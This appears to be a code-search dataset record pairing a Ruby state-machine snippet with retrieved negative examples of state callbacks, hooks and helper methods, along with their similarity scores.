"def pre_enter(state_manager, game)\n # puts \"State : #{self.class}\"\n @exiting = false\n end",
"def across_virtual_state\n super\n end",
"def after_remembered\n end",
"def after_initialize\n end",
"def after_initialize\n end",
"def add_state(s)\n @states << s\n self\n end",
"def after_transition(*args, &block); end",
"def after\n each {|transition| transition.machine.write(object, :event_transition, transition)} if skip_after && success?\n super\n end",
"def after_initialize\n @loaded = Set.new\n end",
"def after_setup\n # do nothing by default\n end",
"def on_initialization_finished()\n end",
"def post_init(&block)\n @hooks[:post_init] = block\n end",
"def post_setup\n end",
"def endState(tag)\n raise \"Not implemented\"\n end",
"def across_service_state\n super\n end",
"def post_init \n self.class.add_signal_traps\n setup_dataflow\n end",
"def after_remembered; end",
"def after_recorded\n end",
"def update\n super\n @ucActStates.update()\n end",
"def state\n end",
"def on_after_load\n end",
"def after_state=(value)\n sync_configuration\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def setup(state) ; end",
"def after_deactivate\n end",
"def finalized; end",
"def after_processing_hook; end",
"def states; end",
"def after_initialize \n end",
"def after_from_gtfs(model_attr_hash)\n end",
"def after_set_callback; end",
"def define_state_initializer\n @instance_helper_module.class_eval <<-end_eval, __FILE__, __LINE__\n # Ensure that the attributes setter gets used to force initialization\n # of the state machines\n def initialize(attributes = nil, *args)\n attributes ||= {}\n super\n end\n \n # Hooks in to attribute initialization to set the states *prior*\n # to the attributes being set\n def attributes=(new_attributes, *args)\n if new_record? && !@initialized_state_machines\n @initialized_state_machines = true\n \n ignore = if new_attributes\n attributes = new_attributes.dup\n attributes.stringify_keys!\n sanitize_for_mass_assignment(attributes).keys\n else\n []\n end\n \n initialize_state_machines(:dynamic => false, :ignore => ignore)\n super\n initialize_state_machines(:dynamic => true, :ignore => ignore)\n else\n super\n end\n end\n end_eval\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def after_initialize\n end",
"def store_merge_state; end",
"def store_merge_state; end",
"def aasm_ensure_initial_state\n self.aasm_state = :new\n end",
"def after(state)\n @its << [@describe_name, @it_name, Time.now.to_f - @it_time]\n super\n end",
"def log_state\n super\n end",
"def after_initialize\n # noop\n end",
"def after_create\n\t\tsuper\n\t\t# associate an enrollment queue\n\t\teq = EnrollmentQueue.create(user_id: self.id)\n\t\tself.enrollment_queue = eq\n\t\teq.user = self\n\t\t# associate a state table\n\t\tst = StateTable.create(user_id: self.id)\n\t\tself.state_table = st\n\t\tst.user = self\n\n\n if not ['app', 'android', 'ios'].include? self.platform\n\t\t self.state_table.update(subscribed?: false) unless ENV['RACK_ENV'] == 'test'\n # self.state_table.update(subscribed?: true)\n end\n\n\t\tif not ['fb', 'app', 'android', 'ios'].include? self.platform\n\t\t\tself.code = generate_code\n\t\tend\n\t\t# puts \"start code = #{self.code}\"\n\t\twhile !self.valid?\n\t\t\tself.code = (self.code.to_i + 1).to_s\n\t\t\t# puts \"new code = #{self.code}\"\n\t\tend\n\t\t# set default curriculum version\n\t\tENV[\"CURRICULUM_VERSION\"] ||= '0'\n\t\tself.update(curriculum_version: ENV[\"CURRICULUM_VERSION\"].to_i)\n\n\t\t# we would want to do\n\t\t# self.save_changes\n\t\t# self.state_table.save_changes\n\t\t# but this is already done for us with self.update and self.state_table.update\n\n\trescue => e\n\t\tp e.message + \" could not create and associate a state_table, enrollment_queue, or curriculum_version for this user\"\n\tend",
"def after\n end",
"def save_state(state)\n states.add(state)\n end"
] |
[
"0.7086918",
"0.68461746",
"0.684084",
"0.67249316",
"0.6607615",
"0.6184547",
"0.6177497",
"0.6144093",
"0.60873175",
"0.60567564",
"0.5937094",
"0.5930762",
"0.59305817",
"0.5927014",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.59043527",
"0.58673424",
"0.5850843",
"0.58504784",
"0.583485",
"0.58290136",
"0.5819438",
"0.58165485",
"0.5815556",
"0.5803605",
"0.57970536",
"0.57947326",
"0.5783348",
"0.5783348",
"0.5783348",
"0.5783348",
"0.57782656",
"0.57782656",
"0.5768442",
"0.5740903",
"0.57244027",
"0.57238144",
"0.5671094",
"0.5669144",
"0.5663747",
"0.5653026",
"0.5623205",
"0.5614976",
"0.5613235",
"0.56122774",
"0.56070596",
"0.5603687",
"0.5600926",
"0.5599944",
"0.5578401",
"0.557285",
"0.5572226",
"0.5563382",
"0.5563382",
"0.55511",
"0.55112195",
"0.5505307",
"0.550309",
"0.5502777",
"0.5494927",
"0.5482751",
"0.54787827",
"0.5465573",
"0.54631007",
"0.54522467",
"0.54485536",
"0.5447107",
"0.54471046",
"0.543084",
"0.54298097",
"0.542921",
"0.54249924",
"0.54249924",
"0.54249924",
"0.54217887",
"0.5418536",
"0.5411244",
"0.5408262",
"0.5401857",
"0.53966206",
"0.53963584",
"0.53924406",
"0.539203",
"0.5389817",
"0.5385887",
"0.5382842",
"0.5382842",
"0.5379341",
"0.5375515",
"0.5373924",
"0.5370209",
"0.53658676",
"0.53581953",
"0.5353961"
] |
0.68584603
|
1
|
Called after a State is removed from its StateMachine.
|
def state_removed! statemachine
transitions_changed!
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def delete_state(state)\n states.remove(state)\n end",
"def erase_state(state_id)\n super\n check_state_remove_effects(state_id)\n end",
"def pop_state\n @state.pop\n end",
"def destroy\n @state.destroy\n end",
"def destroy\n @state.destroy\n end",
"def destroyed(event)\n self.state = nil if event.target.data[:id] == state\n refresh\n end",
"def remove_state(state)\n self.from(state).each { |transition| remove(transition) }\n self.to(state).each { |transition| remove(transition) }\n self.states.delete(state)\n end",
"def on_state_erase(state_id)\n reset_effect_param_cache\n end",
"def clearState()\n\t\t\t@_previous_state = @_state\n\t\t\t@_state = nil\n\t\tend",
"def onstatechange_unregister(b)\n @onstatechange_list.delete b\n end",
"def onstatechange_unregister(b)\n @onstatechange_list.delete b\n end",
"def after_state(state)\n end",
"def exit!\n map = @transition_map\n map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.each(&:unarm)\n end\n end\n\n @exit_actions.each do |exit_action|\n exit_action.call(@state_machine)\n end\n @state_machine.current_state = nil\n end",
"def run_on_deletion(paths)\n @state_machine.remove(paths)\n end",
"def delete_state(state)\n @states.reject! { |_,v| v == state }\n#$stderr.print \"States: #{@states.length} \"\n end",
"def clear_state\n @state.clear\n self\n end",
"def discard_saved_state\n end",
"def destroy\n \"#{@states_assign.assigned_to}StateMachine\".constantize.states.delete(@states_assign.state.name)\n @states_assign.destroy\n\n puts '##############################'\n puts LeadStateMachine.states\n puts '##############################'\n\n respond_to do |format|\n format.html { redirect_to states_assigns_url, notice: 'State was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def pop_state\t\n\t\t\t@state_buffer = Proc.new do\n\t\t\t\t@objs2 = []\n\t\t\t\t@current_state = @states.pop\n\t\t\tend\n\t\tend",
"def drop( number )\n\n load_parent_state\n \n return super\n\n end",
"def reset_state\n @state = nil\n end",
"def remove_from_state state, ios\n return if ios.empty?\n\n state.send do |state|\n SelectorState.new(state.active - ios,\n state.inactive - ios,\n hash_without_keys(state.receivers, ios))\n end\n rescue => e\n log(Logger::ERROR, self.to_s + '#remove_from_state', e.to_s)\n end",
"def destroy(state_manager, game)\n end",
"def discard_saved_state\n execute(\"discardstate\", @uuid)\n end",
"def clear\n current_state.clear\n end",
"def popState()\n\t\t\tif @_state_stack.empty? then\n\t\t\t\tif @_debug_flag then\n\t\t\t\t\t@_debug_stream.puts \"POPPING ON EMPTY STATE STACK.\\n\"\n\t\t\t\tend\n\t\t\t\traise \"empty state stack.\\n\"\n\t\t\telse\n\t\t\t\t@_state = @_state_stack.pop\n\t\t\t\tif @_debug_flag then\n\t\t\t\t\t@_debug_stream.puts \"POP TO STATE : %s\\n\" % @_state.getName\n\t\t\t\tend\n\t\t\tend\n\t\tend",
"def endState(tag)\n raise \"Not implemented\"\n end",
"def cleanup\n @transition_map.each do |type, events_to_transition_arrays|\n events_to_transition_arrays.each do |event, transitions|\n transitions.clear\n end\n end\n\n @transition_map = nil\n @state_machine = nil\n @entry_actions = nil\n @exit_actions = nil\n end",
"def stop_and_cleanup\n raise_outside_initial_queue\n @state_machine.log \"Stopping #{self}...\" if @verbose\n @current_state.send :exit!\n @current_state = nil\n @state_symbols_to_states.values.each(&:cleanup)\n end",
"def pop_scene\n\t\t\tset_state(:stopped)\n\t\tend",
"def unclean_shutdown_state\n super\n end",
"def unresolve\n change_state(:unresolve)\n end",
"def unhook\n Nest.get(base_module).remove(self)\n Agency.instance.retire(self)\n\n and_return(@original_value) if previously_defined?\n\n @original_value = @previously_defined = nil\n self\n end",
"def leave; end",
"def cleanup_state\n delete_if_exists(state_file_path)\n delete_if_exists(chef_file_path)\n delete_if_exists(past_scripts_path)\n delete_if_exists(log_path)\n end",
"def destroy\n @state.destroy\n respond_to do |format|\n format.html { redirect_to states_url, notice: 'State was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @state.destroy\n respond_to do |format|\n format.html { redirect_to states_url, notice: 'State was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def after_destroyed\n end",
"def destroy\n @state.destroy\n respond_to do |format|\n format.html { redirect_to states_url }\n format.json { head :no_content }\n end\n end",
"def destroy(_state)\n workflow do\n run_destroy.bind do\n remove_instance_directory\n end\n end\n end",
"def clean\n reset_states rescue nil\n set_executed_commands rescue nil\n end",
"def shut_down\n end",
"def leave()\n @active.pop\n end",
"def destroy(state)\n hostname = state[:hostname]\n poolsclosed_delete(hostname)\n state.delete(:hostname)\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to(admin_states_url) }\n format.xml { head :ok }\n end\n end",
"def final_state(state)\n final_states(state)\n end",
"def on_remove\n @context.notifications.off(\"graph.start\", self)\n @context.notifications.off(\"graph.stop\", self)\n\n io.outputs.each { |k, o| @context.connections.delete(o.guid) }\n io.unregister_inputs\n var.unregister\n stop\n end",
"def after_deactivate\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to states_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to states_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @event_state.destroy\n respond_to do |format|\n format.html { redirect_to event_states_url, notice: 'Event state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def mouse_out(e)\n @state = nil\n end",
"def destroy\n @state = State.find(params[:id])\n @state.destroy\n\n respond_to do |format|\n format.html { redirect_to(states_url) }\n format.xml { head :ok }\n end\n end",
"def remove_agent_trap_state(opts)\n opts = check_params(opts,[:state])\n super(opts)\n end",
"def setup_rem_state\n return unless PONY::ERRNO::check_sequence(current_act)\n current_action_targets.each do |target|\n state_id = @acts[1]\n chance = @acts[2] || 100\n chance = chance / 100.0 if c.integer?\n target.remove_state(state_id) if rand < chance\n end\n end",
"def unload\n Unit.unload(self.label)\n end",
"def destroy\n @cultural_heritage_collection_state = CulturalHeritage::CollectionState.find(params[:id])\n @cultural_heritage_collection_state.deleted = 1\n @cultural_heritage_collection_state.save\n\n respond_to do |format|\n format.html { redirect_to(cultural_heritage_collection_states_url) }\n format.xml { head :ok }\n end\n end",
"def delete_state(node)\n # => Find the Node\n existing = find_state(node)\n return 'Node not present in state' unless existing\n # => Delete the Node from State\n state.delete(existing)\n # => Write Out the Updated State\n write_state\n # => Return the Deleted Node\n existing\n end",
"def destroy\n @map_state = MapState.find(params[:id])\n @map_state.destroy\n\n respond_to do |format|\n format.html { redirect_to map_states_url }\n format.json { head :ok }\n end\n end",
"def after_clear\n end",
"def close\r\n pop_game_state\r\n end",
"def remove_statefile(path)\n key = path.sub(\"#{statefiles_root}/#{@bucket}/\",'')\n delete_empty_statefile(key)\n end",
"def destroy\n @modelstate.destroy\n respond_to do |format|\n format.html { redirect_to modelstates_url }\n format.json { head :no_content }\n end\n end",
"def after_destroy_hook\n execute_hooks_for(:after, :destroy)\n end",
"def destroy\n\t\t@state = State.find(params[:id])\n if @state.destroy\n \tflash[:success] = \"Record destroyed\"\n \tredirect_to states_path\n else\n \tflash[:error] = \"Record not destroyed\"\n end\n\tend",
"def error_reset\n @@state.delete(@server)\n end",
"def destroy\n @process_state.destroy\n respond_to do |format|\n format.html { redirect_to process_states_url }\n format.json { head :no_content }\n end\n end",
"def restore_graphics_state\n @stack.pop\n end",
"def destroy\n @user_state.destroy\n respond_to do |format|\n format.html { redirect_to user_states_url, notice: 'User state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def after_destroy(machine)\n expire_cache_for(machine)\n MachineChange.create! machine: machine, change_type: MachineChange::ChangeType::DELETE\n end",
"def unload!\n self.choices = @old_choices\n end",
"def destroy\n @surgery_state.destroy\n respond_to do |format|\n format.html { redirect_to surgery_states_url, notice: 'Surgery state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @user_state.destroy\n respond_to do |format|\n format.html { redirect_to user_states_url }\n format.json { head :no_content }\n end\n end",
"def cleanup_hook; end",
"def destroy(state)\n info(\"Destroying instance #{instance.name}\")\n return if state[:server_id].nil?\n instance.transport.connection(state).close\n domain = load_domain(state[:server_id])\n destroy_domain(domain) unless domain.nil?\n info(\"Libvirt instance #{state[:server_id]} destroyed.\")\n state.delete(:server_id)\n state.delete(:hostname)\n end",
"def destroy\n @united_state.destroy\n respond_to do |format|\n format.html { redirect_to united_states_url, notice: 'United state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def unload!\n unload_resources!\n reset_menu!\n end",
"def shutdown\n @registry.clear\n end",
"def un_load\n\n NSLog('Whatever hasn\\'t been unloaded and could be better be now!')\n NSLog('We probably don\\'t need this now that we\\'re using RubyMotion and it\\'s awesome!')\n\n end",
"def destroy\n @private_message_state.destroy\n respond_to do |format|\n format.html { redirect_to private_message_states_url, notice: 'Private message state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @current_state.destroy\n respond_to do |format|\n format.html { redirect_to projects_url, notice: 'CurrentState was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def finalize\r\n push_game_state(Main) # switch to game state \"Menu\"\r\nend",
"def did_destroy\n @destroyed = true\n self.class.identity_map.delete self.id\n self.class.all.delete self\n\n trigger_events(:destroy)\n end",
"def removed(attribute_name)\n changed(attribute_name)\n end",
"def removed(attribute_name)\n changed(attribute_name)\n end",
"def fish_removed()\n @fish_count.pop()\n end",
"def cleanup(machine, opts)\n end",
"def remove_timer_state(entry)\n timer = entry[1]\n @timers.delete entry\n @timers_time.delete timer\n\n state = remove_state(timer, State::STATE_TIMER)\n deregister_state timer if state == 0\n nil\n end",
"def reset_state_at_page_finish\n add_content(\"\\nQ\" * @state_stack.size)\n end",
"def removed; status[:removed]; end",
"def destroyed(item)\n bowline.destroyed(\n name, \n item.id\n ).call\n end",
"def leave()\n raise NotImplementedError\n end",
"def remove; end",
"def remove; end",
"def remove; end",
"def remove; end",
"def destroy\n @task_state.destroy\n respond_to do |format|\n format.html { redirect_to task_states_url, success: 'Task state was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def tear_down; end",
"def event_removed(event, last, last_for_event)\n @persistor.event_removed(event, last, last_for_event) if @persistor\n end",
"def _after_update\n # SEQUEL5: Remove\n @this = nil\n end"
] |
[
"0.7106296",
"0.70077455",
"0.6975829",
"0.6958535",
"0.6958535",
"0.6926397",
"0.69051963",
"0.663011",
"0.6600804",
"0.6598869",
"0.6598869",
"0.6502423",
"0.64411944",
"0.63950866",
"0.63798195",
"0.63691187",
"0.63545805",
"0.62847775",
"0.62550706",
"0.6246275",
"0.6219055",
"0.61982226",
"0.61451423",
"0.6102924",
"0.60805595",
"0.6068126",
"0.60611093",
"0.59717906",
"0.5968932",
"0.592727",
"0.5925986",
"0.5910905",
"0.5870403",
"0.5858344",
"0.5839345",
"0.58224934",
"0.58224934",
"0.57958627",
"0.5787724",
"0.5778472",
"0.5767764",
"0.5756087",
"0.5747704",
"0.57302094",
"0.5718187",
"0.57085574",
"0.56953496",
"0.56769603",
"0.5665861",
"0.5665861",
"0.5663275",
"0.56506",
"0.56335527",
"0.5630487",
"0.562288",
"0.56170446",
"0.5616439",
"0.55947655",
"0.5587196",
"0.55778885",
"0.5560089",
"0.55588675",
"0.5520719",
"0.55166537",
"0.5515691",
"0.55132693",
"0.5488834",
"0.5481407",
"0.54790235",
"0.54776233",
"0.54766136",
"0.5470559",
"0.54639566",
"0.5461429",
"0.5460537",
"0.5458093",
"0.5455836",
"0.5455311",
"0.54522896",
"0.54492754",
"0.5429112",
"0.5426672",
"0.5421432",
"0.54123837",
"0.54123837",
"0.5392527",
"0.53862214",
"0.538111",
"0.53755975",
"0.537527",
"0.53737104",
"0.5368449",
"0.53672296",
"0.53672296",
"0.53672296",
"0.53672296",
"0.53597385",
"0.5359088",
"0.5357405",
"0.5353635"
] |
0.83318
|
0
|
Adds a Pseudostate to this State.
|
def add_connectionPoint! s
_log { "add_connectionPoint! #{s.inspect}" }
if @connectionPoint.find { | x | x.name == s.name }
raise ArgumentError, "connectionPoint named #{s.name.inspect} already exists"
end
@ownedMember << s # ownedElement?!?!
@connectionPoint << s
s.state = self
# Notify.
s.connectionPoint_added! self
s
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def add_state(state)\n inferred_state = infer_state(state)\n self.states.upush! inferred_state if inferred_state\n end",
"def addstate ( ps )\n raise TypeError, ps.class.to_s + ': Incorrectly types for \\'<<\\' method of <Parser>.' unless\n\tps.instance_of? State\n\n @states << ps\n end",
"def add_state(s)\n @states << s\n self\n end",
"def << (triple)\n # self.add_triple(s, p, o)\n @triples += [ triple ]\n end",
"def add_state_attr(attr)\n new_attrs = (self.class.state_attrs << attr).uniq\n self.class.state_attrs(*new_attrs)\n end",
"def add_state(new_state)\n valid = true\n @states.each do |state|\n raise Fae::DuplicateStateException, 'Duplicate state added for Finite Automata' if new_state.name == state.name\n end\n @states << new_state\n end",
"def add_state(state, value = false)\n @states[state] = [\n factory.composite_state(self.class.name, state),\n value\n ]\n\n classify_state @states[state]\n end",
"def add(p)\nq = self.dup\nq.add!(p)\nend",
"def +(p)\n Pair.new(@x + p.x, @y + p.y)\n end",
"def add_neuron(n)\n neurons << n\n end",
"def add(name, state)\n\tif(@states[name] != nil)\n\t raise StateMachine::Error, \"state '#{name}' exists\"\n\tend\n\t@states[name] = state\n\treturn self\n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def new_state\n newID = @@nextID\n @@nextID += 1\n @state[newID] = true\n @transition[newID] = {}\n newID \n end",
"def dup_adding_state(line)\n self.class.new(queue, codec, path).add_state(line)\n end",
"def set_PADD(value)\n set_input(\"PADD\", value)\n end",
"def add(p0) end",
"def +(value)\n duplicate = self.dup \n duplicate << value\n duplicate\n end",
"def +(p)\n group(self, p)\n .fmap {|(x, y)| x + y }\n .tap {|r| r.label = \"(#{label} + #{p.label})\" }\n end",
"def <<( n )\n n.add_label!( self )\n end",
"def +(delta)\n clone.increment(Meangirls.node, delta)\n end",
"def save_state(state)\n states.add(state)\n end",
"def add(time)\n newDuration = self.dup() ;\n return self.inc(time) ;\n end",
"def yadd( off )\n @y.add( off )\n self\n end",
"def add(pointer, pmodes)\n args = get_parameters(pointer, pmodes)\n @ram[args[2]] = args[0] + args[1]\n pointer + 4\n end",
"def dup_state\r\n @state.dup\r\n end",
"def add point\n self.x += point.x\n self.y += point.y\n self\n end",
"def new_state\nnewID = @@nextID\n@@nextID += 1\n@state[newID] = true\n@transition[newID] = {}\nnewID\nend",
"def add_to_point point\n add_to_point! point.dup\n end",
"def add(o)\n @hash[o] = true\n self\n end",
"def +(other)\n self.clone.set(@addr + other, @family)\n end",
"def + (point)\n self.class.new(x + point.x, y + point.y)\n end",
"def add (input)\n @g_inputs << input\n end",
"def +(other)\n transitions = @transitions.merge(other.transitions)\n # Add a new empty transition from the final states in the current\n # automaton to the inital state in the adjoined automaton.\n @final_states.each do |s|\n if transitions[s]\n transitions[s].merge!({nil => other.initial_state })\n else\n transitions[s] = {nil => other.initial_state }\n end\n end\n\n # Should check automaton type here instead of defaulting to NDFSA\n NDFSA.new(transitions, @initial_state, other.final_states, @cats)\n end",
"def <<(p)\n raise TypeError, \"Esperada pregunta para inserción\" unless p.is_a? (Pregunta)\n if (@total == 0)\n @cabeza = Nodo.new(p, nil, nil)\n @cola = @cabeza\n else\n @cola.next = Nodo.new(p, nil, @cola)\n @cola = @cola.next\n @cola.value\n end\n @total += 1\n end",
"def +(*others)\n self.dup.add!(*others)\n end",
"def add!(p)\n@x += p.x\n@y += p.y\nself\nend",
"def add_synonym(synonym)\n synonyms << synonym\n end",
"def add_states(new_states); end",
"def add_agg_pubkey(activate_height, agg_pubkey)\n payload = activate_height.to_even_length_hex + agg_pubkey\n index = latest_agg_pubkey_index\n next_index = (index.nil? ? 0 : index + 1).to_even_length_hex\n db.batch do\n db.put(KEY_PREFIX[:agg_pubkey] + next_index, payload)\n db.put(KEY_PREFIX[:latest_agg_pubkey], next_index)\n end\n end",
"def add num = 1\n @ec.add reg, size * num\n end",
"def test_add_state\n Automaton.new(false) do |fa|\n s0 = fa.add_state\n assert_equal(1, fa.state_count)\n assert_equal(false, s0.initial?)\n assert_equal(false, s0.accepting?)\n\n s1 = fa.add_state(:initial => true)\n assert_equal(2, fa.state_count)\n assert_equal(true, s1.initial?)\n assert_equal(false, s1.accepting?)\n\n s2 = fa.add_state(:initial => true, :accepting => true)\n assert_equal(3, fa.state_count)\n assert_equal(true, s2.initial?)\n assert_equal(true, s2.accepting?)\n\n s3 = fa.add_state(:myownkey => \"blambeau\")\n assert_equal(4, fa.state_count)\n assert_equal(false, s3.initial?)\n assert_equal(false, s3.accepting?)\n assert_equal(\"blambeau\", s3[:myownkey])\n\n assert_equal(0, fa.edge_count)\n end\n end",
"def +(ts)\n self.clone.add_points ts\n end",
"def add\n match '+'\n term\n emit_ln 'ADD (SP)+, D1'\nend",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add(other)\r\n Bottle.new(@label, @ounces+other.ounces)\r\n end",
"def add_state(state)\n if not @states.include? state\n # Prevents arbitrarily overriding methods that you shouldn't be\n raise \"Method already taken #{state}?\" if @class.methods.include?(:\"#{state}?\")\n @states[state] = State.new(state)\n @class.send(:define_method, :\"#{state}?\"){current_state == state}\n end\n end",
"def add(other)\n clone.add! other\n end",
"def add(d, s, t)\n reg_w(d, reg_r(s) + reg_r(t))\n adv_pc\n end",
"def add_property(x)\n x = Property.create(x)\n safe_add_edge(x, x.opposite, :provable_false)\n safe_add_edge(x.opposite, x, :provable_false)\n safe_add_edge(x, x, :provable_true)\n safe_add_edge(x.opposite, x.opposite, :provable_true)\n x\n end",
"def add(opt)\n ipaddr_modify(RTM_NEWADDR, NLM_F_CREATE|NLM_F_EXCL, opt)\n end",
"def + point\n\t\tPoint.new(@x+point.x, @y+point.y)\n\tend",
"def add!(point)\r\n @x += point.x\r\n @y += point.y\r\n end",
"def add_feature(feature, state)\n check_feature_is_not_symbol(feature)\n check_feature_already_in_list(feature)\n Redis.current.hset(@redis_key, feature, state)\n end",
"def add_neuron(neuron)\r\n\t\t@neurons.push(neuron)\r\n\tend",
"def add(coordinate)\n new_x = @x + coordinate.x\n new_y = @y + coordinate.y\n new_coordinate = Coordinate.new(new_x,new_y)\n end",
"def add (geneBits)\n @genePool[@size] = Gene.new(@geneLen)\n @genePool[@size].duplicate(geneBits)\n @genePool[@size].fitness = geneBits.fitness\n @size += 1\n end",
"def add(value)\n \n end",
"def add word\n super word.clone\n end",
"def add(value)\n @add_at_next = 0 unless @add_at_next\n add_at @add_at_next, value\n end",
"def add_state(v)\nunless has_state?(v)\n@state[v] = true\n@transition[v] = {}\nend\nend",
"def +(val)\n Thread.current[:datet_addmode] = \"+\"\n self.add_something(val)\n end",
"def add_single toadd\n case toadd\n when Dist\n dist << @len.Dist\n dist.last_born << toadd\n else\n return false\n end\n true\n end",
"def add_shape(properties = {})\n shape = Shape.new(properties)\n shape.palette = @palette\n\n @shapes ||= []\n @shapes << shape # Store shape reference.\n shape\n end",
"def << (sup)\r\n new_network_id = self.get_network_id\r\n set_network_id = lambda do |s|\r\n raise(PlanB::InvalidClass, \"supported must be descendant of AlnTermination\") unless s.class.class_hierarchy.include?(AlnTermination)\r\n s.network_id = new_network_id\r\n s.layer_id = self.layer_id + 1\r\n s.termination_supporter = self\r\n s.save\r\n end\r\n sup.class.eql?(Array) ? sup.each{|s| set_network_id[s]} : set_network_id[sup]\r\n self.aln_resource << sup\r\n end",
"def add(el)\n # System.out.println(\"add(\"+el+\")\");\n n = word_number(el)\n # System.out.println(\"word number is \"+n);\n # System.out.println(\"bits.length \"+bits.length);\n if (n >= @bits.attr_length)\n grow_to_include(el)\n end\n @bits[n] |= bit_mask(el)\n end",
"def add_hex(hex)\n @hexes.push(hex)\n end",
"def +(seconds)\n TzTime.new(time + seconds, @zone)\n end",
"def add_gold(gold)\n @goldcounter += gold\n @goldcounter\n end",
"def +(other_point)\n Point.new(self.x + other_point.x, self.y + other_point.y)\n end",
"def add(point)\r\n new_point = Marshal.load(Marshal.dump(self))\r\n new_point.x = @x + point.x\r\n new_point.y = @y + point.y\r\n return new_point\r\n end",
"def +( other )\n dup << other\n end",
"def << (n)\n raise ArgumentError unless n.is_a?(Nota)\n self.old_append n \n end",
"def add_noise(data)\n noise(data, :+)\n end",
"def plus(signal)\n self.class.new(self, signal) { |a, b| a + b}\n end",
"def +(other)\n return dup.add(other)\n end",
"def add_node(n)\n @nodes.push n unless @nodes.include? n\n end",
"def add (p)\n @people << p \n end",
"def +(other)\n unioned = Automaton.new\n fa.dup(unioned)\n other.to_fa.dup(unioned)\n RegLang.new(unioned)\n end",
"def <<(input_token)\n @current_states = next_states(@current_states, input_token)\n end",
"def add_state(node, user, params)\n # => Create a Node-State Object\n (n = {}) && (n[:name] = node)\n n[:created] = DateTime.now\n n[:creator] = user\n n[:type] = params['type'] if params['type']\n # => Build the Updated State\n update_state(n)\n # => Return the Added Node\n find_state(node)\n end",
"def add!(rhs)\n @x += rhs.x\n @y += rhs.y\n self\n end",
"def Add(val)\n self.value += val\n end",
"def +(other)\n self.class.new(batch_state.to_h.merge(other.batch_state.to_h))\n end",
"def add_pin(_pin)\n raise \"pin named #{_pin.name} already added\" if @pins.include?(_pin.name)\n @pins[_pin.name] = _pin\n end",
"def add!(rhs)\n add rhs, self\n end",
"def add_fish (fish)\n @fish_population << fish\n\n end",
"def add_new_state_and_transition state_list, transitions, from_id, msg, destinations\n new_state_id = id_generator.next\n state_list << State.new(new_state_id, destinations )\n self.transitions << Transition.new(from_id, new_state_id, msg)\n end",
"def add_process!(redis, process_id)\n redis.multi do |conn|\n conn.zadd(key, Time.now.to_i, process_id)\n conn.expire(key, @timeout)\n end\n end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
"def +(p0) end",
"def +(other)\n `return self + other;`\n end",
"def +(other)\n `return self + other;`\n end",
"def add_address(address)\n @addresses << address\n end",
"def add(name, value = nil)\n symbols << [name.to_s, (Integer(value) if value)]\n end",
"def add(p, set_first = false)\n angle = self.angle(p)\n prior_idx = @neighbors.bsearch_index { |n| self.angle(n) >= angle }\n\n raise \"Point #{p.inspect} is already a neighbor of #{self.inspect}\" if prior_idx && @neighbors[prior_idx] == p\n\n @neighbors.insert(prior_idx || @neighbors.length, p)\n\n @first = p if @first.nil? || set_first\n end",
"def add_new\n self.times_used.unshift(0)\n self.save\n end",
"def add_round_key(state, round_key)\n state = Matrix.build(Nb, Nk) do |row, col|\n state[row, col] ^ round_key[row, col]\n end\n print_state(state, __method__) if DEBUG\n state\n end",
"def add(type)\n @value << type\n @value = @value.uniq\n end"
] |
[
"0.55765295",
"0.54607874",
"0.5139848",
"0.5138874",
"0.504211",
"0.50295275",
"0.49795917",
"0.49791703",
"0.49349418",
"0.4918888",
"0.48471597",
"0.47565934",
"0.47565934",
"0.47565934",
"0.47557563",
"0.47550985",
"0.47549525",
"0.47235757",
"0.47175694",
"0.47154087",
"0.47069126",
"0.46915808",
"0.46711937",
"0.46645337",
"0.46600065",
"0.46524134",
"0.4652322",
"0.4638726",
"0.45977417",
"0.4597115",
"0.45768738",
"0.4569087",
"0.45355994",
"0.45354936",
"0.45223352",
"0.4519889",
"0.45139337",
"0.45095053",
"0.44920325",
"0.44856012",
"0.44814417",
"0.4477048",
"0.44734687",
"0.44643426",
"0.44617188",
"0.44617188",
"0.44497025",
"0.44491652",
"0.44447985",
"0.4444712",
"0.44446218",
"0.44361895",
"0.44262728",
"0.4421441",
"0.44179112",
"0.4417401",
"0.4415284",
"0.43940037",
"0.43828607",
"0.4379975",
"0.43797952",
"0.437901",
"0.43698683",
"0.43677405",
"0.43673137",
"0.43587083",
"0.43549255",
"0.43529713",
"0.43436235",
"0.43419766",
"0.43327218",
"0.43290532",
"0.43289176",
"0.43212378",
"0.43171877",
"0.43168154",
"0.43058276",
"0.42980778",
